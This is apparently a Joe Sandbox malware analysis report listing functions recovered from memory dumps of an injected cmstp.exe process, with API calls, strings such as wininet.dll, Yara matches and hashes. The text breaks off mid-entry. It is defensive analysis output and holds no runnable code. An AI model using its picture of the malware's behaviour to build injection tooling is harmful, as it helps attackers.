Function 04992DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992DDA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be77f2629b639763b7669c66af97ff527c5ad185dc17775cd07e312b559a84bf
Instruction ID: b44ed7c68a56d6aa6ff7c241ca9b553f86ab79f2b8dda2a719bcdae0467c4549
Opcode Fuzzy Hash: be77f2629b639763b7669c66af97ff527c5ad185dc17775cd07e312b559a84bf
Instruction Fuzzy Hash: 4890026174254152B545F1984408507404A9BE0245795C022A1415950C8526E966D661

Uniqueness

Uniqueness Score: -1.00%

Function 04992DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992DFA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b0c19d1670ac9ddc9a8b5548d09fad11485c33ce83387a1b64ad8832ad89af5
Instruction ID: 71dca92d416e69f30fb42a1c246c7860646029482793e3a5d08ce1bfa02844e8
Opcode Fuzzy Hash: 1b0c19d1670ac9ddc9a8b5548d09fad11485c33ce83387a1b64ad8832ad89af5
Instruction Fuzzy Hash: 6790027170150413F111B1984508707004D8BD0245F95C422A0425558D9656DA62A161

Uniqueness

Uniqueness Score: -1.00%

Function 04992D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992D1A

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ffee03de729713800330f651244d63576265752f46c4fd6b58a90c36d63ddb7
Instruction ID: dc05046d291408570442734acb1dc26d92ccf713b7f5e72e812266838d30215d
Opcode Fuzzy Hash: 3ffee03de729713800330f651244d63576265752f46c4fd6b58a90c36d63ddb7
Instruction Fuzzy Hash: 3690026971350002F180B198540C60A00498BD1206F95D425A0016558CC915D9795361

Uniqueness

Uniqueness Score: -1.00%

Function 04992EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992EAA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58d155b3636cc580092be850d27c49630022ca2e7c513fb75544ba055fbceb84
Instruction ID: 55a55c519fcc4a1f705e81ec8d89400f2c227095dc6afd9704f4f010c878ec1b
Opcode Fuzzy Hash: 58d155b3636cc580092be850d27c49630022ca2e7c513fb75544ba055fbceb84
Instruction Fuzzy Hash: 619002B170150402F140B198440874600498BD0305F55C021A5065554E8659DEE566A5

Uniqueness

Uniqueness Score: -1.00%

Function 04992FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992FEA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09a20d8057406c0a753c80a926e7cf2463f6481902e10aed6fb7f1bc4d725ec0
Instruction ID: bc983aa8e75bdc36943b5ad7a05b5ebef953b1a50e4071b0fb06939ff6080bcc
Opcode Fuzzy Hash: 09a20d8057406c0a753c80a926e7cf2463f6481902e10aed6fb7f1bc4d725ec0
Instruction Fuzzy Hash: 7A900261711D0042F200B5A84C18B0700498BD0307F55C125A0155554CC915D9715561

Uniqueness

Uniqueness Score: -1.00%

Function 04992F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992F3A

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92b3d9d911ebf2ff63c3a9983a25630f315860c2e99a982bc983ebe2c30c3688
Instruction ID: a7f5c8befc72c57ecc39edec88ff5bd83feacc6f086c6a248ed7057fe5564f7b
Opcode Fuzzy Hash: 92b3d9d911ebf2ff63c3a9983a25630f315860c2e99a982bc983ebe2c30c3688
Instruction Fuzzy Hash: 879002A174150442F100B1984418B060049CBE1305F55C025E1065554D8619DD626166

Uniqueness

Uniqueness Score: -1.00%

Function 04992AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992ADA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a7fce6e8a8310e29b66ae7d1e58e67a3a132a910a75bd88ba0b09ab336350c20
Instruction ID: 015e5a36a43b75b95db138e27a32979063fa75cfa375ba41b6f69098e850489c
Opcode Fuzzy Hash: a7fce6e8a8310e29b66ae7d1e58e67a3a132a910a75bd88ba0b09ab336350c20
Instruction Fuzzy Hash: 43900265711500036105F5980708507008A8BD5355355C031F1016550CD621D9715161

Uniqueness

Uniqueness Score: -1.00%

Function 04992BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992BFA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63432a1e1aecf29ccf0cd3a0e77bf1c88865e870cb77a75e640f77c810ced055
Instruction ID: 973941797bc35543de13e7a2d59b04812ad34933e87ca32ee6a798c14bb37c75
Opcode Fuzzy Hash: 63432a1e1aecf29ccf0cd3a0e77bf1c88865e870cb77a75e640f77c810ced055
Instruction Fuzzy Hash: FC90027170150802F180B198440864A00498BD1305F95C025A0026654DCA15DB6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04992BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992BEA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f451d306d216c3a873b9629d82f7004233847d1c89de6f306aa437a32ad1f644
Instruction ID: b0cc09b44b1d27c95d0ab7435ebf6a4ec1ec643535a222380ee0cb0182f98567
Opcode Fuzzy Hash: f451d306d216c3a873b9629d82f7004233847d1c89de6f306aa437a32ad1f644
Instruction Fuzzy Hash: 1890027170554842F140B1984408A4600598BD0309F55C021A0065694D9625DE65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04992B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992B6A

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c009f41f0f0ac8b2ec6f48106e4cc8aa320c3ed1c70dea9885c264129e8f967
Instruction ID: 691d607aaf1140cb22b13adb73c5ab8cfbc93c1ac0228f5f9d9393e01fa4d957
Opcode Fuzzy Hash: 2c009f41f0f0ac8b2ec6f48106e4cc8aa320c3ed1c70dea9885c264129e8f967
Instruction Fuzzy Hash: 299002A170250003A105B1984418616404E8BE0205B55C031E1015590DC525D9A16165

Uniqueness

Uniqueness Score: -1.00%

Function 049935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049935CA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac4889376256f47f0eac817b787f1e9620eb7afc5d89b71d55d4f72680df02a4
Instruction ID: 37fff6d99ebccf4362aa7343ef1395ff86a6b6fd91d1fd3fe7e11c0d85102a7a
Opcode Fuzzy Hash: ac4889376256f47f0eac817b787f1e9620eb7afc5d89b71d55d4f72680df02a4
Instruction Fuzzy Hash: 08900271B0560402F100B198451870610498BD0205F65C421A0425568D8795DA6165E2

Uniqueness

Uniqueness Score: -1.00%

Function 00819040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 008190E8

Strings

wininet.dll, xrefs: 0081909E, 008190A7
net.dll, xrefs: 008190B1, 00819137, 0081910F, 0081911B, 00819143

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 24f992a207bb748c9e5da5560b0743f9ec68700af8ac01ef7fbd9c29fef3e48a
Instruction ID: 281f453e2a126abdadaec2a0e34b642e48de8c0255bbb29a56eed371afcbcf93
Opcode Fuzzy Hash: 24f992a207bb748c9e5da5560b0743f9ec68700af8ac01ef7fbd9c29fef3e48a
Instruction Fuzzy Hash: F73190B2500745BBC724DF68D885FA7B7B8FF48B00F10801DF66AAB245DA74A590CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00819036 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 008190E8

Strings

wininet.dll, xrefs: 0081909E, 008190A7
net.dll, xrefs: 008190B1, 0081910F, 0081911B

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 2268fb9380f846a801af9852f14e5f7eb9a958da3fca2cb27cf847f4f4f9981b
Instruction ID: 5508090eccc1154a859a5d3e51c58cdc8611a125948d7b6866ef679ff2120d6f
Opcode Fuzzy Hash: 2268fb9380f846a801af9852f14e5f7eb9a958da3fca2cb27cf847f4f4f9981b
Instruction Fuzzy Hash: 4021A2B1900705BBC724EF68D895FA7B7B8FF48700F10801DE66DAB245D774A590CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0081A629 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00803AF8), ref: 0081A65D

Strings

.z`, xrefs: 0081A64C, 0081A658

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 9d03955498acc5766aacb8eec95590c1523ee23b961afc8ae33b73f542261a41
Instruction ID: 6c30f56d8f6813dbe1b59bff2835f07ac7a9fd24371e00af6526ac3eabdcb45c
Opcode Fuzzy Hash: 9d03955498acc5766aacb8eec95590c1523ee23b961afc8ae33b73f542261a41
Instruction Fuzzy Hash: 2BE06DBA1405086BDB18DF64DC85EE7776EEF84350F048285FD0C5B242CA31E814C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 0081A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00803AF8), ref: 0081A65D

Strings

.z`, xrefs: 0081A64C, 0081A658

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: f2a8241e988e2211f5703c358e43ae859df54876a5296800c6d6513536c62d93
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: FEE01AB12002046BD718DF59DC45EA777ADEF88750F014555B90857241C630E9108AB1

Uniqueness

Uniqueness Score: -1.00%

Function 00808310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0080836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0080838B

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
Instruction ID: 36012d7e08c3e039bda3d8959c42798d0ffd1d31b26dc2d0be5691b96c60abe5
Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
Instruction Fuzzy Hash: F1018471A80328B7E724A6989C03FFE776CBF41B50F050114FB04FA1C1E694690546E6

Uniqueness

Uniqueness Score: -1.00%

Function 0080ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0080AD52

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
Instruction ID: 4d481e3b28aa46fa3f5a9c30c9293f46d4cf7fa7bd6f39938aa10af003fcf96f
Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
Instruction Fuzzy Hash: 5E010CB5E4020DABDB14DAA4DC42FDDB378EF54308F104595AD18D7281F671EA548B92

Uniqueness

Uniqueness Score: -1.00%

Function 0081A6A0 Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0081A6F4

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 92c1e99393a5087f5bf909b59517b3e155ce3a5e452075ac44f99d7dd0e2c26b
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 4401AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00819163 Relevance: 1.5, APIs: 1, Instructions: 40
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0080F040,?,?,00000000), ref: 008191AC

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 669bb1f1aaae851335033a222213f973e11168a25735afd5b719dc8a2492a1a4
Instruction ID: bed0b4daab15291d2623be28c82002543b635dbf68b483704aa1212a61dfc0ad
Opcode Fuzzy Hash: 669bb1f1aaae851335033a222213f973e11168a25735afd5b719dc8a2492a1a4
Instruction Fuzzy Hash: 8EF0A07A2806003AD230655C9C03FE7BB9CEF95B60F14002AFB49EB2C2D595E88247A6

Uniqueness

Uniqueness Score: -1.00%

Function 00819170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0080F040,?,?,00000000), ref: 008191AC

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c35a859212ac55cb307c4d5fd61a32011c0f73bb152a88c30bd4d6aeb91ea20c
Instruction ID: 4c90c8bc4c4b78b718e1169538b623bf1997d6a7914a0a56af2f3d871a72c1b4
Opcode Fuzzy Hash: c35a859212ac55cb307c4d5fd61a32011c0f73bb152a88c30bd4d6aeb91ea20c
Instruction Fuzzy Hash: 4AE06D773802043AE620659DAC02FE7B39CEF91B31F180026FB4DEB2C1D595F84142A5

Uniqueness

Uniqueness Score: -1.00%

Function 0081A781 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0080F1C2,0080F1C2,?,00000000,?,?), ref: 0081A7C0

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9e863f8942eee418665cbafba3f6b58d8d5e765832f1d3269bbd66cd1451b2ef
Instruction ID: 5f360cc0494e7bd22f5291f150e96f0507b1e9eb3d129bef109e216f24fdf697
Opcode Fuzzy Hash: 9e863f8942eee418665cbafba3f6b58d8d5e765832f1d3269bbd66cd1451b2ef
Instruction Fuzzy Hash: EDE0A9B22006087FCB24DF48DC84EE733AEEF89360F008156B90D97280DA30E811CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0081A5F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00814526,?,00814C9F,00814C9F,?,00814526,?,?,?,?,?,00000000,00000000,?), ref: 0081A61D

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 4e63df73946a6398b6f626ed466547a4b3bddc4bb33c72c359f3554059d1cbb5
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 9DE01AB1200204ABD714DF59DC41EA777ADEF88654F114559BA085B241C530F9118AB1

Uniqueness

Uniqueness Score: -1.00%

Function 0081A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0080F1C2,0080F1C2,?,00000000,?,?), ref: 0081A7C0

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 3a655a36e174452a71697a9b4522add071ecb844a1f58f5f336f042f1d14f51e
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: DAE01AB12002086BDB14DF49DC85EE737ADEF88650F018155BA0C57241C930E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0080F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00808D14,?), ref: 0080F6EB

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
Instruction ID: a7ec1ced382e0ad087141e0bfaa6f1fcf51b8d46f702de0f8761bbfe3a051d58
Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
Instruction Fuzzy Hash: 29D0A9B27903083BEA20FAA89C03F6633CCBB55B10F494074FA48EB3C3E964E4008566

Uniqueness

Uniqueness Score: -1.00%

Function 04992C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992C24

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a37e6d100a7b1ba4332483201e460837b1aa66720b913c871b7af4a88c72770f
Instruction ID: bbc7bfe0f05e7537b219c714fa7cfb85e74127d8091b06669f0d938565be4877
Opcode Fuzzy Hash: a37e6d100a7b1ba4332483201e460837b1aa66720b913c871b7af4a88c72770f
Instruction Fuzzy Hash: 73B09B71D015C5D5FF11F764460C71779446BD0705F15C4B1D2030651F4738E5D1E1B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04992890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0499293C
___swprintf_l.LIBCMT ref: 0499295E
___swprintf_l.LIBCMT ref: 049929A3
___swprintf_l.LIBCMT ref: 049CA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 049CA54E
::%hs%u.%u.%u.%u, xrefs: 049CA527
ffff:, xrefs: 049CA504
:%u.%u.%u.%u, xrefs: 049CA5B8

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
